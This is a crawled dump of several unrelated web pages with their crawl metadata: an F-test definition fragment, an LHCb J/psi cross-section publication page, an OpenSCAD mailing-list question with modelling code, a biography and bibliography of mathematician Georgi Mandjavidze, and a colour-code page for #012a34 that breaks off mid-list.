the F ratio and is used to determine whether to reject the null hypothesis.\n\n### What is the null hypothesis for the F test?\n\nThe null hypothesis is that all variances are equal. The alternative hypothesis is the variances are not equal." ]
[ null, "https://www.isixsigma.com/wp-content/uploads/2018/11/Screen-Shot-2022-06-23-at-1.16.32-PM.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95574915,"math_prob":0.9560521,"size":2719,"snap":"2023-40-2023-50","text_gpt3_token_len":564,"char_repetition_ratio":0.16169429,"word_repetition_ratio":0.03757829,"special_character_ratio":0.19970578,"punctuation_ratio":0.07575758,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9957334,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-01T06:12:09Z\",\"WARC-Record-ID\":\"<urn:uuid:dc00f803-1bf7-45eb-8cdf-dfa71d789564>\",\"Content-Length\":\"199863\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4aedb98d-3383-4155-90fb-8e025e11c60e>\",\"WARC-Concurrent-To\":\"<urn:uuid:68462215-44f9-4ed8-bdf6-dea5406131e9>\",\"WARC-IP-Address\":\"104.26.11.35\",\"WARC-Target-URI\":\"https://www.isixsigma.com/dictionary/f-test/\",\"WARC-Payload-Digest\":\"sha1:3JLD7WAJC5UJKKMPY53RFMGR5DOOLA45\",\"WARC-Block-Digest\":\"sha1:TUTAMZCERW2BAXE5XZ5SBBPYZ24D2NZT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510781.66_warc_CC-MAIN-20231001041719-20231001071719-00704.warc.gz\"}"}
https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/LHCb-PAPER-2011-003.html
[ "# Measurement of $J/\\psi$ production in $pp$ collisions at $\\sqrt{s}$ = 7 TeV\n\n[to restricted-access page]\n\n## Abstract\n\nThe production of J/psi mesons in proton-proton collisions at sqrt(s)=7 TeV is studied with the LHCb detector at the LHC. The differential cross-section for prompt J/psi production is measured as a function of the J/psi transverse momentum pT and rapidity y in the fiducial region 0<pT<14 GeV/c and 2.0<y<4.5. The differential cross-section and fraction of J/psi from b-hadron decays are also measured in the same pT and y ranges. The analysis is based on a data sample corresponding to an integrated luminosity of 5.2pb-1. The measured cross-sections integrated over the fiducial region are 10.52 +/- 0.04 +/- 1.40 +1.64/-2.20 mub for prompt J/psi production and 1.14 +/- 0.01 +/- 0.16 mub for J/psi from b-hadron decays, where the first uncertainty is statistical and the second systematic. The prompt J/psi production cross-section is obtained assuming no J/psi polarisation and the third error indicates the acceptance uncertainty due to this assumption.\n\n Dimuon mass distribution ({\\it left}) and $t_z$ distribution ({\\it right}), with fit results superimposed, for one bin ($3 < p_{\\rm T} <4 \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$, $2.5 ## Tables and captions Summary of systematic uncertainties. Table_1.pdf [54 KiB] HiDef png [183 KiB] Thumbnail [83 KiB] tex code", null, "Mean$ p_{\\rm T}$and RMS for$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$(assumed unpolarised) and$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$. The first uncertainty is statistical, the second systematic and the third for$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$the uncertainty due to the unknown polarisation. Table_2.pdf [43 KiB] HiDef png [77 KiB] Thumbnail [25 KiB] tex code", null, "$\\frac{{\\rm d}\\sigma}{{\\rm d}y}$in nb for$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$(assumed unpolarised) and$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$, integrated over$ p_{\\rm T}$. The first uncertainty is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_3.pdf [35 KiB] HiDef png [65 KiB] Thumbnail [34 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for prompt$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity, assuming no polarisation. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_4.pdf [38 KiB] HiDef png [126 KiB] Thumbnail [58 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_5.pdf [38 KiB] HiDef png [115 KiB] Thumbnail [60 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for prompt$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity, assuming fully transversely polarised$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_6.pdf [38 KiB] HiDef png [126 KiB] Thumbnail [58 KiB] tex code", null, "$\\frac{{\\rm d}^2\\sigma}{{\\rm d}p_{\\rm T}{\\rm d}y}$in nb/($ \\mathrm{GeV}\\mskip -2mu/\\mskip -1mu c$) for prompt$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity, assuming fully longitudinally polarised$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$. The first error is statistical, the second is the component of the systematic uncertainty that is uncorrelated between bins and the third is the correlated component. Table_7.pdf [38 KiB] HiDef png [122 KiB] Thumbnail [60 KiB] tex code", null, "Fraction of$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu \\mathrm{from} b$(in %) in bins of the$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$transverse momentum and rapidity. The first uncertainty is statistical, the second systematic (uncorrelated between bins) and the third is the uncertainty due to the unknown polarisation of the$\\mathrm{prompt} J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu$; the central values are for unpolarised$ J\\mskip -2.5mu/\\mskip -1mu\\psi\\mskip 1mu\\$ . Table_8.pdf [39 KiB] HiDef png [148 KiB] Thumbnail [66 KiB] tex code", null, "Created on 20 August 2019.Citation count from INSPIRE on 23 August 2019." ]
[ null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_1.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_2.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_3.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_4.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_5.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_6.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_7.png", null, "https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/Directory_LHCb-PAPER-2011-003/thumbnail_Table_8.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5938359,"math_prob":0.99549127,"size":9162,"snap":"2019-35-2019-39","text_gpt3_token_len":3058,"char_repetition_ratio":0.2332387,"word_repetition_ratio":0.42316258,"special_character_ratio":0.31346866,"punctuation_ratio":0.085178874,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964356,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-24T11:47:24Z\",\"WARC-Record-ID\":\"<urn:uuid:83645113-6696-4965-96df-7cf3f79282f3>\",\"Content-Length\":\"24487\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:40a257bf-f662-4e06-b4c8-d924e97a4a88>\",\"WARC-Concurrent-To\":\"<urn:uuid:b30d0ac7-a378-4631-97aa-b2194712be4f>\",\"WARC-IP-Address\":\"137.138.150.3\",\"WARC-Target-URI\":\"https://lhcbproject.web.cern.ch/lhcbproject/Publications/p/LHCb-PAPER-2011-003.html\",\"WARC-Payload-Digest\":\"sha1:QMFIEZRMXVR74U5WEIQRWUZE7LXXHBXK\",\"WARC-Block-Digest\":\"sha1:JIUCGIAEY6YERJSSKBIA5XD6GYPZP6AE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027320734.85_warc_CC-MAIN-20190824105853-20190824131853-00324.warc.gz\"}"}
http://lists.openscad.org/pipermail/discuss_lists.openscad.org/2016-June/019242.html
[ "# [OpenSCAD] mixing 2D and 3D\n\njon jon at jonbondy.com\nSat Jun 25 17:58:16 EDT 2016\n\n```I'm playing around with moldings. I thought I was careful to keep all\nof the 2D stuff together and all of the 3D stuff together, but I guess I\nwas wrong.\n\n1) if I do a hull() on 2D objects, don't I get a 2D object as a result?\n\n2) can a module() return a 2D object?\n\n3) sure would be nice if the error messages gave even a HINT about where\n\nThanks\n\nJon\n\n---\n\n\\$fn = 100;\neps = 0.1;\n\nmodule RoundedSquare(x, y) {\nhull() {\ntranslate([0, 1]) square(1);\ntranslate([x-4, y-4]) circle(4);\ntranslate([x-1, 1]) square(1);\ntranslate([0, y-1]) square(1);\n}\n}\n\nmodule CrossSection1()\ndifference() {\nunion() {\nsquare([10, 20]);\ntranslate([10, 3])\ncircle(2);\n}\ntranslate([10, 15])\ncircle(2);\n}\n\nCrossSection1();\n\ntranslate([0, 30, 0])\nCrossSection2();\n\nmodule CrossSection2()\ndifference() {\nunion() {\nRoundedSquare(10, 20);\ntranslate([10, 12])\ncircle(2);\n}\ntranslate([10, 5])\ncircle(2);\n}\n\ntranslate([80, 0, 0])\nrotate([0, -90, 0])\nlinear_extrude(height = 50)\nCrossSection1();\n\ntranslate([80, 30, 0])\nrotate([0, -90, 0])\nlinear_extrude(height = 50)\nCrossSection2();\n\ndifference() {\ntranslate([-50, 50 + 15, 0])\nrotate([0, -90, 90])\nlinear_extrude(height = 50)\nCrossSection2();\ntranslate([-50, 0, -eps])\nrotate([0, -90, 0])\nlinear_extrude(height = 50)\nCrossSection2();\n}\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6824252,"math_prob":0.99260515,"size":1435,"snap":"2020-10-2020-16","text_gpt3_token_len":489,"char_repetition_ratio":0.17679945,"word_repetition_ratio":0.046511628,"special_character_ratio":0.40209058,"punctuation_ratio":0.19932432,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96871406,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-08T06:00:19Z\",\"WARC-Record-ID\":\"<urn:uuid:c80172cd-abeb-44e4-b089-0e2821a3cd58>\",\"Content-Length\":\"4348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0a66cddd-a521-43ba-83d3-a609749c679f>\",\"WARC-Concurrent-To\":\"<urn:uuid:c03ece7c-7002-4f1a-9c46-b4cd0b3f9320>\",\"WARC-IP-Address\":\"172.104.30.75\",\"WARC-Target-URI\":\"http://lists.openscad.org/pipermail/discuss_lists.openscad.org/2016-June/019242.html\",\"WARC-Payload-Digest\":\"sha1:PUFJ3J6SJYKIU4YGG7Y42GPJFDAYDCWL\",\"WARC-Block-Digest\":\"sha1:LUQLVAXZ3GO3DTRDBLAHZARKF4NM4WOG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371810617.95_warc_CC-MAIN-20200408041431-20200408071931-00416.warc.gz\"}"}
http://www.rmi.ge/person/manjavidze/
[ "", null, "# Professor Georgi Mandjavidze\n\n## (6.V.1924 - 13.IV.1999)\n\nEDUCATION AND SCIENTIFIC DEGREES\n\n 1931 - 1941 Pupil of Zestafoni Secondary School 1942 - 1947 Student of Tbilisi State University Faculty of Mechanics and Mathematics 1947 - 1950 Post-Graduate Student of A.Razmadze Mathematical Institute of the Georgian Academy of Sciences 1951 Cand. (Phys. & Math.), Tbilisi State University 1970 Dr. Sci. (Phys. & Math.), Tbilisi State University 1991 Full Professor Tbilisi State University\n\nPOSITIONS HELD AND ACADEMIC EXPERIENCE\n\n 1950 - 1954 Scientific secretary of the A. Razmadze Mathematical Institute of the Georgian Academy of Sciences 1954 - 1977 The deputy director of A. Razmadze Mathematical Institute of the Georgian Academy of Sciences 1983 - 1999 Head of the Department of Theory of Complex Analysis and its Application\n\nRESEARCH INTERESTS\n\nBoundary value problems of the theory of functions of a complex variable, Singular Integral Equations\n\nPRIZES and AWARDS\n\n 1966 Medal for Distinction in Labour 1970 Jubilee Medal 1991 N. Muskhelishvili's Prize for the monograph \"Boundary Value Problems of Conjugation with Displacement for Analytic and Generalized Functions\", Tbilisi Univ. Press, 1990, 176 p.\n\nMAIN PUBLICATIONS\n\n(i) Monographs\n\n1. Boundary Value Problems of Conjugation with Displacement for Analytic and Generalized Functions, Tbilisi Univ. Press, 1990, 176 p.\n\n(ii) Papers\n\n2. On one class of singular integral equations with discontinuous coefficients. (Russian) Soobshch. AN GSSR, 11(1950), No. 5, 269-274.\n3. On one system of singular integral equations with discontinuous coefficients. (Russian) Soobshch. AN GSSR, 11(1950), No.6, 350-360.\n4. On one singular integral equation with discontinuous coefficients and its application to the theory of elasticity. (Russian) Prikladn. Matem. i Mekh., 15(1951), No.3, 351-356.\n5. On an approximate solution of boundary value problems of the theory of functions of a complex variable. (Russian) Soobshch. AN GSSR, 14(1953), No.10, 577-582.\n6. On an approximate solution of boundary value problems of the theory of analytic functions. Proc. of the III All-Union Mathem. Forum, I(1956), p.88.\n7. On the Riemann-Privalov problem with continuous coefficients (with G. Akhalaia). (Russian) DAN SSSR, 123(1958), No.5, 791-794.\n8. An approximate solution of boundary value problems of the theory of analytic functions. In: \"Investigations in modern problems of the theory of functions of a complex variable\" by A.I. Markushevich. Moscow, 1960, 365-380.\n9. Mathematical and natural sciences, mathematics and mechanics (with G. Chogoshvili). In: \"Science in the Soviet Georgia for 40 years\". Acad. of Sciences of the Georgian SSR, Tbilisi, 1961.\n10. On the problem of linear conjugation and singular integral equations with a Cauchy kernel with continuous coefficients (with B. Khvedelidze). Trudy Tbiliss. Mat. Inst. 28(1962), 85-105.\n11. Methods of the theory of analytic functions in some statical problems of elasticity (with A. Kalandia). The II All-Union Congress in the Theoretical and Applied Mechanics. Annotations of reports. Moscow, 1964, 99-100.\n12. Singular integral equations as a tool of solving the mixed problems of the theory of elasticity. Proc. of International Symposium (Tbilisi, 1963). Moscow, 1(1965), 237-247.\n13. Problem of linear conjugation in the plane theory of elasticity. Conference in Mechanics. Annotations of reports. Bucharest, 1965, p.304.\n14. On boundary value problems of linear conjugation with displacement. International Congress of Mathematicians. Theses of Reports. Moscow, 7(1965), p.43.\n15. Review of works in the theory of elasticity (with G. Barenblat, A. Kalandia). In: \"Some Basic Problems of the Mathematical Theory of Elasticity\" by N.I. Muskhelishvili, Ch. VIII, Nauka, Moscow, 1966.\n16. Boundary value problems of linear conjugation of general type with displacements. Trudy Tbiliss. Mat. Inst. 33(1967), 76-81.\n17. Boundary value problems of linear conjugation with a displacement and its connection with the theory of generalized analytic functions. Trudy Tbiliss. Mat. Inst. 33(1967), 82-87.\n18. On the behaviour of the boundary value problem of linear conjugation. Trudy Tbiliss. Mat. Inst. 35(1969), 173-182.\n19. One-dimensional singular integral equations (with B. Khvedelidze). History of Home Mathematics. Akad. Nauk SSSR i Akad. Nauk Ukr.SSR, 4(1970), I, 774-786.\n20. Boundary value problems of linear conjugation and some of their applications. Thesis of Dissertation submitted for doctor's degree (Phys., Math.), TBilisi State University, 1970.\n21. On the behaviour of derivative solutions of systems of singular integral equations and boundary value problems of the theory of analytic functions. Congress Int. des Mathematicians, Nice, Les 265 Communications Individualles, p. 192.\n22. Statement and methods of the solution of problems of the plane theory of elasticity; basic results of investigation of the plane theory of elasticity (with A. Kalandia). In: Mechanics in the USSR for 50 years\", 3(1972), Moscow.\n23. Boundary value problems of linear conjugation with piecewise continuous matrix coefficients. \"Continuum Mechanics and Related Problems of Analysis\", (Collection of works, dedicated to the 30th Birthday Anniversary of Academician N. I. Muskhelishvili), Nauka, Moscow, 1972.\n24. On the reduction of the boundary value problem of linear conjugation with a displacement to the problem of linear conjugation. DAN SSSR, 234(1977), No.4, 758-760.\n25. On the application of the theory of generalized analytic functions to the boundary problem of conjugation with a displacement. DAN SSSR, 237(1977), No.4, 1285-1289.\n26. On one family of boundary value problems of linear conjugation. (Russian) Soobshch. Akad. Nauk GSSR, 95(1979), No.2, 289-292.\n27. Application of the theory of generalized analytic functions to the investigation of boundary value problems of linear conjugation with displacement. In: Differential integral equations, boundary value problems. (Collection of works dedicated to the memory of I.N. Vekua), Tbilisi State University, 1979.\n28. On some families of boundary value problems of linear conjugation. Reports of Seminar of I. Vekua Inst. of Appl. Math., Tbilisi, 1980, No. 14.\n29. Academician N.I. Muskhelishvili. Society \"Znanie\", GSSR, Tbilisi, 1981.\n30. Application of methods of the theory of generalized analytic functions to the boundary value problems of linear conjugation with displacement. All-Union Symposium in Partial Differential Equations and Their Applications. Annotations of reports, Tbilisi, 1982, p. 13.\n31. On one class of boundary value problems of linear conjugation. (Russian) Soobshch. AN GSSR, 105(1982), No. 3, 493-496.\n32. On some boundary value problems for nonlinear differential systems of the first order on the plane. In: Boundary value problems of the theory of generalized analytic functions and their applications. Inst. of Appl. Math. Tbiliss. State Univ., 1983.\n33. The boundary value problems of linear conjugation with displacement. Complex analysis and applications. Sofia, 1984, 375-382.\n34. On boundary value problems for nonlinear systems of differential equations on a plane (with W. Tutschke). (Russian) Soobshch. AN GSSR, 113(1984), No.1, 30-32.\n35. Some estimates of the norms of derivatives of holomorphic functions and their application to initial value problems (with W. Tutschke).(Russian) Z. Anal. Anwendungen 3(1984), No. 1, 1-5.\n36. On one differential boundary value problem of the theory of generalized analytic functions (with G. Akhalaia). Reports of Enlarged Seminar of I. Vekua Inst. of Appl. Math. I(1985), No.1.\n37. Boundary value problems of the theory of generalized analytic vectors with angular points. Functional differential equations and their applications. Theses of reports. Dagestan State Univ., Makhachkala, 1986, p.139.\n38. Differential boundary value problem for generalized analytic functions (with G. Akhalaia).(Russian) Trudy Inst. Prikl. Mat. TGU, 21(1987).\n39. Ilia Nesterovich Vekua (to the 80th Birthday Anniversary (with N. Bogoliubov, O. Oleinik, S. Sobolev, B. Khvedelidze).(Russian) Uspekhi Mat. Nauk, 42(1987), No 3.\n40. Boundary value problems of the theory of generalized analytic vectors for domains with angular points (with G. Akhalaia). All-Union Symposium \"Modern problems of mathematical physics\". Annotations of reports, Tbilisi, 1987, p.4.\n41. Differential boundary value problems for generalized analytic vectors (with Ngo Van Lyoc).All-Union Symposium \"Modern problems of mathematical physics\". Annotations of reports, Tbilisi, 1987, p.28.\n42. The problem V for generalized analytic vectors (with Ngo Van Lyoc). (Russian) Soobshch. AN GSSR, 128(1987), No. 2, 265-268.\n43. Differential boundary value problems for generalized analytic vectors. Modern problems of mathematical physics. Proc. of All-Union Symposium, Tbilisi State University, v. 2, 1987.\n44. Boundary value problems of the theory of generalized analytic vectors for domains with angular points (with G. Akhalaia). Modern problems of mathematical physics. Proc. of All-Union Symposium, Tbilisi State University, 1987, v. 2.\n45. To Green's identity for generalized analytic vectors (with G. Akhalaia). (Russian) Trudy IPM TGU, 28(1988).\n46. A survey of N.I. Muskhelishvili's scientific heritage. Continuum mechanics and related problems of analysis (with B. Khvedelidze) (Tbilisi, 1991). \"Metsniereba\", Tbilisi, 1993,\n47. Boundary value problems of the theory of generalized analytic vectors. Functional analytic methods in complex analysis and applications to partial differential equations (Trieste, 1993, 13-51). World Sci. Publishing, River Edge, NJ, 1995.\n48. Ilia Vekua's 90th birthday anniversary. International Symposium on Differential Equations and Mathematical Physics (with R.P. Gilbert, G.V. Jaiani) (Tbilisi, 1997). Memoirs on Differential Equations and Mathematical Physics, 12(1997), 1-10.\n49. On some problems for first order elliptic systems in the plane. Complex methods for partial differential equations (with Akhalaia). Ed. G.W.Begehr, A.O. Celebi and W. Tutschke. Kluwer Academic Publishers, 1999. 57-95.\n50. Boundary value problem with inclined derivative for second order elliptic system in the plane of complex variables (with Akhalaia). Complex Variables, 46(2001), 287-294." ]
[ null, "http://www.rmi.ge/person/manjavidze/mandj40.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73165643,"math_prob":0.921313,"size":10236,"snap":"2019-35-2019-39","text_gpt3_token_len":2753,"char_repetition_ratio":0.1879398,"word_repetition_ratio":0.20027249,"special_character_ratio":0.26484954,"punctuation_ratio":0.21436004,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.97667557,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-26T03:16:35Z\",\"WARC-Record-ID\":\"<urn:uuid:8368fa16-fabd-43f3-9486-54d7c542cfd3>\",\"Content-Length\":\"13074\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16de873c-e732-47ad-aa25-1968644d9a9f>\",\"WARC-Concurrent-To\":\"<urn:uuid:7644a5e9-26f6-4029-adef-464b07dc72dd>\",\"WARC-IP-Address\":\"109.205.45.234\",\"WARC-Target-URI\":\"http://www.rmi.ge/person/manjavidze/\",\"WARC-Payload-Digest\":\"sha1:6UVQ2ZOXBB34P6ERYWLSWHVV4D3FYHON\",\"WARC-Block-Digest\":\"sha1:V6EQKCEZHC3XL4VA6DXIPZDSGM6QGHCH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027330962.67_warc_CC-MAIN-20190826022215-20190826044215-00323.warc.gz\"}"}
https://www.colorhexa.com/012a34
[ "# #012a34 Color Information\n\nIn a RGB color space, hex #012a34 is composed of 0.4% red, 16.5% green and 20.4% blue. Whereas in a CMYK color space, it is composed of 98.1% cyan, 19.2% magenta, 0% yellow and 79.6% black. It has a hue angle of 191.8 degrees, a saturation of 96.2% and a lightness of 10.4%. #012a34 color hex could be obtained by blending #025468 with #000000. Closest websafe color is: #003333.\n\n• R 0\n• G 16\n• B 20\nRGB color chart\n• C 98\n• M 19\n• Y 0\n• K 80\nCMYK color chart\n\n#012a34 color description : Very dark cyan.\n\n# #012a34 Color Conversion\n\nThe hexadecimal color #012a34 has RGB values of R:1, G:42, B:52 and CMYK values of C:0.98, M:0.19, Y:0, K:0.8. Its decimal value is 76340.\n\nHex triplet RGB Decimal 012a34 `#012a34` 1, 42, 52 `rgb(1,42,52)` 0.4, 16.5, 20.4 `rgb(0.4%,16.5%,20.4%)` 98, 19, 0, 80 191.8°, 96.2, 10.4 `hsl(191.8,96.2%,10.4%)` 191.8°, 98.1, 20.4 003333 `#003333`\nCIE-LAB 15.009, -9.362, -10.372 1.46, 1.91, 3.54 0.211, 0.276, 1.91 15.009, 13.972, 227.929 15.009, -10.625, -9.032 13.821, -5.328, -5.513 00000001, 00101010, 00110100\n\n# Color Schemes with #012a34\n\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #340b01\n``#340b01` `rgb(52,11,1)``\nComplementary Color\n• #013425\n``#013425` `rgb(1,52,37)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #011134\n``#011134` `rgb(1,17,52)``\nAnalogous Color\n• #342501\n``#342501` `rgb(52,37,1)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #340111\n``#340111` `rgb(52,1,17)``\nSplit Complementary Color\n• #2a3401\n``#2a3401` `rgb(42,52,1)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #34012a\n``#34012a` `rgb(52,1,42)``\n• #01340b\n``#01340b` `rgb(1,52,11)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #34012a\n``#34012a` `rgb(52,1,42)``\n• #340b01\n``#340b01` `rgb(52,11,1)``\n• #000000\n``#000000` `rgb(0,0,0)``\n• #000202\n``#000202` `rgb(0,2,2)``\n• #01161b\n``#01161b` `rgb(1,22,27)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #013e4d\n``#013e4d` `rgb(1,62,77)``\n• #025266\n``#025266` `rgb(2,82,102)``\n• #02677f\n``#02677f` `rgb(2,103,127)``\nMonochromatic Color\n\n# Alternatives to #012a34\n\nBelow, you can see some colors close to #012a34. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #013431\n``#013431` `rgb(1,52,49)``\n• #013334\n``#013334` `rgb(1,51,52)``\n• #012e34\n``#012e34` `rgb(1,46,52)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #012634\n``#012634` `rgb(1,38,52)``\n• #012234\n``#012234` `rgb(1,34,52)``\n• #011d34\n``#011d34` `rgb(1,29,52)``\nSimilar Colors\n\n# #012a34 Preview\n\nThis text has a font color of #012a34.\n\n``<span style=\"color:#012a34;\">Text here</span>``\n#012a34 background color\n\nThis paragraph has a background color of #012a34.\n\n``<p style=\"background-color:#012a34;\">Content here</p>``\n#012a34 border color\n\nThis element has a border color of #012a34.\n\n``<div style=\"border:1px solid #012a34;\">Content here</div>``\nCSS codes\n``.text {color:#012a34;}``\n``.background {background-color:#012a34;}``\n``.border {border:1px solid #012a34;}``\n\n# Shades and Tints of #012a34\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000b0e is the darkest color, while #f9feff is the lightest one.\n\n• #000b0e\n``#000b0e` `rgb(0,11,14)``\n• #011a21\n``#011a21` `rgb(1,26,33)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #013a47\n``#013a47` `rgb(1,58,71)``\n• #02495a\n``#02495a` `rgb(2,73,90)``\n• #02596e\n``#02596e` `rgb(2,89,110)``\n• #026881\n``#026881` `rgb(2,104,129)``\n• #037894\n``#037894` `rgb(3,120,148)``\n• #0387a7\n``#0387a7` `rgb(3,135,167)``\n• #0497bb\n``#0497bb` `rgb(4,151,187)``\n• #04a6ce\n``#04a6ce` `rgb(4,166,206)``\n• #04b6e1\n``#04b6e1` `rgb(4,182,225)``\n• #05c5f4\n``#05c5f4` `rgb(5,197,244)``\n• #12cdfa\n``#12cdfa` `rgb(18,205,250)``\n• #26d1fb\n``#26d1fb` `rgb(38,209,251)``\n• #39d5fb\n``#39d5fb` `rgb(57,213,251)``\n• #4cd9fc\n``#4cd9fc` `rgb(76,217,252)``\n• #5fddfc\n``#5fddfc` `rgb(95,221,252)``\n• #73e1fc\n``#73e1fc` `rgb(115,225,252)``\n• #86e5fd\n``#86e5fd` `rgb(134,229,253)``\n• #99e9fd\n``#99e9fd` `rgb(153,233,253)``\n• #aceefd\n``#aceefd` `rgb(172,238,253)``\n• #c0f2fe\n``#c0f2fe` `rgb(192,242,254)``\n• #d3f6fe\n``#d3f6fe` `rgb(211,246,254)``\n• #e6faff\n``#e6faff` `rgb(230,250,255)``\n• #f9feff\n``#f9feff` `rgb(249,254,255)``\nTint Color Variation\n\n# Tones of #012a34\n\nA tone is produced by adding gray to any pure hue. In this case, #191b1c is the less saturated color, while #012a34 is the most saturated one.\n\n• #191b1c\n``#191b1c` `rgb(25,27,28)``\n• #171c1e\n``#171c1e` `rgb(23,28,30)``\n• #151e20\n``#151e20` `rgb(21,30,32)``\n• #131f22\n``#131f22` `rgb(19,31,34)``\n• #112024\n``#112024` `rgb(17,32,36)``\n• #0f2126\n``#0f2126` `rgb(15,33,38)``\n• #0d2328\n``#0d2328` `rgb(13,35,40)``\n• #0b242a\n``#0b242a` `rgb(11,36,42)``\n• #09252c\n``#09252c` `rgb(9,37,44)``\n• #07262e\n``#07262e` `rgb(7,38,46)``\n• #052830\n``#052830` `rgb(5,40,48)``\n• #032932\n``#032932` `rgb(3,41,50)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #012a34 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the 